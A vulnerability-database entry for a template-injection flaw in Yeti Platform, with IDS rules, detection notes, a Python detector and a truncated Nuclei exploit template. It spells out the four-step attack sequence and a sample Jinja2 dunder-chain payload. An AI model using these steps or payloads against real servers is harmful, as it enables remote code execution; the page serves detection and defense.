CVE-2024-46507
Published 2026-05-08
Priority: P2 78 · CVSS 3.1: 7.3 (high)
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
ITW Exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 3.92% (89.0th percentile)
A SSTI (server side template injection) vulnerability in the custom template export function in yeti-platform yeti before 2.1.12 allows attackers to execute code on the application server.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yeti-platform | yeti | >= 2.0 < 2.1.12 | 2.1.12 |
Detection & IOCs (extracted from sources)
url: /api/v2/auth/token
url: /api/v2/templates/
url: /api/v2/templates/render
cookie: yeti_session=eyJ
snort:
```
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS YETI Platform Server-Side Template Injection (CVE-2024-45607)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/v2/templates/"; fast_pattern; http.cookie; content:"yeti_session|3d|eyJ"; http.request_body; content:"|22|template|22 3a|"; content:"|7b 25|"; distance:0; pcre:"/^[^\x2e]*?(?:\x2e\x5f{1,2}\w+)+[\x28\x5b]/R"; reference:url,github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-46507; reference:cve,2024-45607; classtype:web-application-attack; sid:2059842; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_02_03, cve CVE_2024_45607, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2025_02_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
```
bytes: |22|template|22 3a|
bytes: |7b 25|
- The Snort/Suricata PCRE `/^[^\x2e]*?(?:\x2e\x5f{1,2}\w+)+[\x28\x5b]/R` matches Python dunder-attribute traversal chains (e.g. `.__class__.__base__`) in the request body, which is the core SSTI gadget pattern. The `/R` flag anchors it relative to the preceding `{%` content match, so plain dotted attribute access without a leading underscore (e.g. `obj.value`) does not fire.
- Exploitation requires authentication first. Monitor for a POST to /api/v2/auth/token followed shortly by POSTs to /api/v2/templates/ and /api/v2/templates/render from the same source IP.
- The exploit flow is: (1) authenticate, (2) create a malicious template via POST /api/v2/templates/, (3) create an observable, (4) render the template via POST /api/v2/templates/render. Alerting on this 4-step sequence is a high-fidelity detection.
- The session cookie prefix `yeti_session=eyJ` (`eyJ` is the base64 encoding of `{"`, the start of a JSON JWT header) is present in exploit traffic and can be used as an additional filter in HTTP-layer detections.
- The Jinja2 template block opener |7b 25| (`{%`) in a request body to /api/v2/templates/ is a strong indicator of a template injection attempt.
- The Snort rule references CVE-2024-45607 in its metadata and msg, but the vulnerability actually being exploited is CVE-2024-46507. Ensure SID 2059842 is mapped to the correct CVE in your SIEM/IDS.
- The Nuclei PoC template requires valid credentials (username/password variables) to authenticate before exploiting. Detection rules should account for authenticated SSTI attempts, not just unauthenticated probes.
- The Snort rule specifies `tls_state TLSDecrypt` in its metadata, meaning it only fires on decrypted TLS traffic. Deploy it with SSL inspection enabled, or supplement it with endpoint-level detection in encrypted environments.
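The detection notes above turned into runnable logic, as an added example that is not code from this page, the ET rule, or the Yeti project: the Snort rule's ordered content checks replayed on one HTTP request record, and the auth -> create template -> render sequence correlated per source IP. The record fields (ts, src, method, uri, cookie, body) and all sample requests are constructed; the correlation only needs the three network-visible steps, since observable creation (step 3) is not part of the rule.

```python
import re
from collections import defaultdict

AUTH_URI, TEMPLATES_URI, RENDER_URI = "/api/v2/auth/token", "/api/v2/templates/", "/api/v2/templates/render"
# The rule's PCRE, applied relative (/R) to the "{%" content match that precedes it.
DUNDER_CHAIN = re.compile(r"^[^.]*?(?:\._{1,2}\w+)+[(\[]")

def matches_snort_rule(req):
    """Replay the ordered content checks of SID 2059842 on one request record."""
    if req["method"] != "POST" or TEMPLATES_URI not in req["uri"]:
        return False
    if "yeti_session=eyJ" not in req.get("cookie", ""):          # yeti_session|3d|eyJ
        return False
    body = req.get("body", "")
    key = body.find('"template":')                               # |22|template|22 3a|
    opener = body.find("{%", key) if key >= 0 else -1            # |7b 25| with distance:0
    return opener >= 0 and DUNDER_CHAIN.match(body[opener + 2:]) is not None

def exploit_sequences(records, window=300):
    """Source IPs that POST auth -> templates -> render within `window` seconds."""
    by_ip = defaultdict(list)
    for r in sorted(records, key=lambda r: r["ts"]):
        by_ip[r["src"]].append(r)
    hits = []
    for ip, reqs in by_ip.items():
        stage, t0 = 0, None                                      # simple per-IP state machine
        for r in reqs:
            if r["method"] != "POST":
                continue
            if stage == 0 and r["uri"] == AUTH_URI:
                stage, t0 = 1, r["ts"]
            elif stage == 1 and r["uri"] == TEMPLATES_URI and r["ts"] - t0 <= window:
                stage = 2
            elif stage == 2 and r["uri"] == RENDER_URI and r["ts"] - t0 <= window:
                hits.append(ip)
                break
    return hits

# Constructed sample traffic (not from any real capture); the cookie value is a placeholder.
COOKIE = "yeti_session=eyJhbGciOiJIUzI1NiJ9.placeholder"
BENIGN = '{"template":{"name":"export","template":"value,tags\\n{% for obj in data %}{{ obj.value }}{% endfor %}"}}'
SUSPECT = '{"template":{"name":"AA","template":"value,tags\\n{% for obj in data %}{{ obj.__class__.__base__[0] }}{% endfor %}"}}'
SAMPLE = [
    {"ts": 0, "src": "198.51.100.7", "method": "POST", "uri": AUTH_URI, "cookie": "", "body": "username=..."},
    {"ts": 5, "src": "198.51.100.7", "method": "POST", "uri": TEMPLATES_URI, "cookie": COOKIE, "body": SUSPECT},
    {"ts": 9, "src": "198.51.100.7", "method": "POST", "uri": RENDER_URI, "cookie": COOKIE, "body": '{"template_id":"1"}'},
    {"ts": 2, "src": "203.0.113.9", "method": "POST", "uri": TEMPLATES_URI, "cookie": COOKIE, "body": BENIGN},
]
```

Running both checks over SAMPLE flags only 198.51.100.7: its template body carries the dunder chain, and it completes the auth-create-render sequence within the window, while the benign export from 203.0.113.9 matches neither.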
Suricata
ET WEB_SPECIFIC_APPS YETI Platform Server-Side Template Injection (CVE-2024-45607)
suricata · 2025-02-03 · CVSS 5.8 · CVE-2024-45607 [MEDIUM]
Rule:
```
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS YETI Platform Server-Side Template Injection (CVE-2024-45607)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/api/v2/templates/"; fast_pattern; http.cookie; content:"yeti_session|3d|eyJ"; http.request_body; content:"|22|template|22 3a|"; content:"|7b 25|"; distance:0; pcre:"/^[^\x2e]*?(?:\x2e\x5f{1,2}\w+)+[\x28\x5b]/R"; reference:url,github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-46507; reference:cve,2024-45607; classtype:web-application-attack; sid:2059842; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2025_02_03, cve CVE_2024_45607, deployment Perimeter, deployment
```
Nuclei
Yeti Platform < 2.1.12 - Server-Side Template Injection to RCE
nuclei
```yaml
id: CVE-2024-46507

info:
  name: Yeti Platform < 2.1.12 - Server-Side Template Injection to RCE
  metadata:
    verified: true
    max-request: 4
  tags: cve,cve2024,yeti,platform,ssti,rce,intrusive,vkev,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /api/v2/auth/token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryodI9qNm7xBZLCq9n

        ------WebKitFormBoundaryodI9qNm7xBZLCq9n
        Content-Disposition: form-data; name="username"

        {{username}}
        ------WebKitFormBoundaryodI9qNm7xBZLCq9n
        Content-Disposition: form-data; name="password"

        {{password}}
        ------WebKitFormBoundaryodI9qNm7xBZLCq9n--

    matchers:
      - type: word
        part: body
        words:
          - access_token
        internal: true

  - raw:
      - |
        POST /api/v2/templates/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"template":{"name":"AA","template":"value,tags\n{% for obj
```